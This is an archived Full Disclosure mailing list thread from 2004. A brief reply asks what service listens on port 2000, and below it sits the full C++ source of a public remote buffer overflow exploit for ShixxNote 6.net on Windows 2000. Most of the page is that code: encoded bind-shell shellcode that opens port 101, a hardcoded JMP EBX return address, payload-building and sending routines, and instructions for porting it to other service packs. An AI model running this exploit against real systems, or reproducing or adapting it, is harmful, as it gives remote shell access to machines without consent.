Full Disclosure mailing list archives
Re: Windows 2000 Remote Buffer Overflow by class101
From: kf_lists <kf_lists () secnetops com>
Date: Fri, 22 Oct 2004 19:04:12 -0500
What listens on port 2000? -KF sk3tch () sk3tch net wrote:
Posted here: http://dfind.kd-team.com/36/55/op.php "Stack based overflow, bug discovered by Luigi Auriemma aluigi.altervista.org Tested working on Win2K, This public version crash on any WinXP, read the code why. The exploit bind a shellcode on the victim port 101."From the code:"Why Win2k only? After some days of debugging on it , I finally figured out how toexploit this hole, this public overflow method works only on Win2k, using the JMP EBX from comdlg32.dll from Win2k SP4 english.Because on WinXP , the register EBX points to a NULL address, this is not exploitable even if you update the JMP EBX, not exploitable VIA THIS WAY on XP I mean OK!. How do I did then on Win2k? I overwritte EIP with a JMP EBX, EBX is a perfect register because it points directly to my buffer, but problem, it points 4 bytes only before EIP, quite short... But enough to say him to jump ~80 bytes higher. Now i have enough space to adjust my shellcode to ESI and to finally jump to it... That's why on WinXP (and maybe others , havent tested) this doesnt worksbecause EBX isnt available.Not happy? code yours or get a pvt version ;p How do I update to Win2k SP1 Dutch for example ? Grab a JMP EBX address in comdlg32.dll from this OS and update the code." _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
/* ShixxNote 6.net buffer overflow exploit v0.1 Public exploit overflows only Win2K systems, else crashs. Exploit code by class101 [at] DFind.kd-team.com Bind a shellcode to the port 101. Thanx to Luigi Auriemma(aluigi () altervista org) for the bug discovery Thanx to HDMoore and Metasploit.com for their kickass ASM work. Why Win2k only? After some days of debugging on it , I finally figured out how to exploit this hole, this public overflow method works only on Win2k, using the JMP EBX from comdlg32.dll from Win2k SP4 english. Because on WinXP , the register EBX points to a NULL address, this is not exploitable even if you update the JMP EBX, not exploitable VIA THIS WAY on XP I mean OK!. How do I did then on Win2k? I overwritte EIP with a JMP EBX, EBX is a perfect register because it points directly to my buffer, but problem, it points 4 bytes only before EIP, quite short... But enough to say him to jump ~80 bytes higher. Now i have enough space to adjust my shellcode to ESI and to finally jump to it... That's why on WinXP (and maybe others , havent tested) this doesnt works because EBX isnt available. Not happy? code yours or get a pvt version ;p How do I update to Win2k SP1 Dutch for example ? Grab a JMP EBX address in comdlg32.dll from this OS and update the code. Take a look at www.KD-Team.com, really nice peaces of code to find. Good job DiabloHorn ;) Take a look at www.GovernmentSecurity.org, good public place if you ignore all lame threads ^^ and all retarded, without to name them to not add credits to their stupidity.... Greets cp, and sorry jester .... */ #include "winsock2.h" #include "fstream.h" #pragma comment(lib, "ws2_32") //BIND shellcode port 101, XORed 0x88, thanx HDMoore. char scode[] = "\xEB" "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF" "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D" "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9" "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C" "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89" "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03" "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F" "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88" "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61" "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9" "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C" "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8" "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68" "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F" "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23" "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89" "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9" "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77" "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77" "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77" "\x58\x68\x61\x63\x6B\x90"; /* //Execute regedit.exe, XORed 0x88, hardcoded Win2k SP4 English char scode2[] = "\xEB" "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF" "\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\xF5\x3C\x4E\xCD\x7C\xFA\x4E\xCD" "\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x70\xEC\x4E\xCD\x71\xE1\x4E\xCD" "\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x75\xF0\x4E\xCD\x76\xED\x4E\xCD" "\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\xB7\xC8\xD0\xF4\x77\x58\xE0\x89" "\x88\x88\x88\x30\xF5\x86\xD0\xF4\x77\x58\x68\x61\x63\x6B\x90"; */ static char payload[5000]; char jmpebxw2k[]="\x79\x3c\xb6\x76"; //JMP EBX - comdlg32.dll - Win2k SP4 English void usage(char* us); WSADATA wsadata; void ver(); int main(int argc,char *argv[]) { ver(); if ((argc<2)||(argc>3)){usage(argv[0]);return -1;} if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;} int ip=htonl(inet_addr(argv[1])), sz, port, sizev, sizew, sizex, sizey, sizez, v, w, x, y, z; if (argc==3){port=atoi(argv[2]);} else port=2000; SOCKET s; struct fd_set mask; struct timeval timeout; struct sockaddr_in server; s=socket(AF_INET,SOCK_STREAM,0); if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;} server.sin_family=AF_INET; server.sin_addr.s_addr=htonl(ip); server.sin_port=htons(port); WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL); timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask); switch(select(s+1,NULL,&mask,NULL,&timeout)) { case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;} case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;} default: if(FD_ISSET(s,&mask)) { cout<<"[+] connected, constructing the payload..."<<endl; Sleep(1000); sizev=5; sizew=88; sizey=800-sizeof(scode); sizex=5; sizez=20; sz=sizev+sizew+sizex+sizez+sizeof(scode)+sizey; memset(payload,0,sizeof(payload)); strcat(payload,"~~"); for (v=0;v<sizev;v++){strcat(payload,"\x61");} strcat(payload,"\x66\x8b\xf3"); strcat(payload,"\x66\x83\xc6\x09"); strcat(payload,"\xff\xe6"); for (w=0;w<sizew;w++){strcat(payload,"\x61");} strcat(payload,"\xeb"); strcat(payload,"\x9d\x61\x61"); strcat(payload,jmpebxw2k); for (x=0;x<sizex;x++){strcat(payload,"\x90");} strcat(payload,scode); for (y=0;y<sizey;y++){strcat(payload,"\x61");} for (z=0;z<sizez;z++){strcat(payload,"~");} if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;} cout<<"[+] size of payload: "<<sz<<endl; cout<<"[+] payload send, connect the port 101 to get a shell."<<endl; return 0; } } closesocket(s); WSACleanup(); return 0; } void usage(char* us) { cout<<"USAGE: 101_shixx.exe Ip Port\n"<<endl; cout<<"NOTE: "<<endl; cout<<" The port 2000 is default if no port specified."<<endl; cout<<" The exploit bind a shellcode to the port 101."<<endl; cout<<" Public version - Win2k systems only"<<endl; cout<<" Update the JMP address for another SP/Language"<<endl; return; } void ver() { cout<<endl; cout<<" "<<endl; cout<<" ===================================================[v0.1]===="<<endl; cout<<" =======ShixxNote 6.net, Remote Buffer Overflow Exploit======="<<endl; cout<<" =====coded by class101===========[DFind.kd-team.com 2004]===="<<endl; cout<<" ============================================================="<<endl; cout<<" "<<endl; }
Current thread:
- Windows 2000 Remote Buffer Overflow by class101 sk3tch (Oct 22)
- Re: Windows 2000 Remote Buffer Overflow by class101 Danny (Oct 22)
- Re: Windows 2000 Remote Buffer Overflow by class101 J.A. Terranson (Oct 23)
- Re: Windows 2000 Remote Buffer Overflow by class101 kf_lists (Oct 22)
- <Possible follow-ups>
- Re: Windows 2000 Remote Buffer Overflow by class101 class 101 (Oct 22)
- Re: Windows 2000 Remote Buffer Overflow by class101 Danny (Oct 22)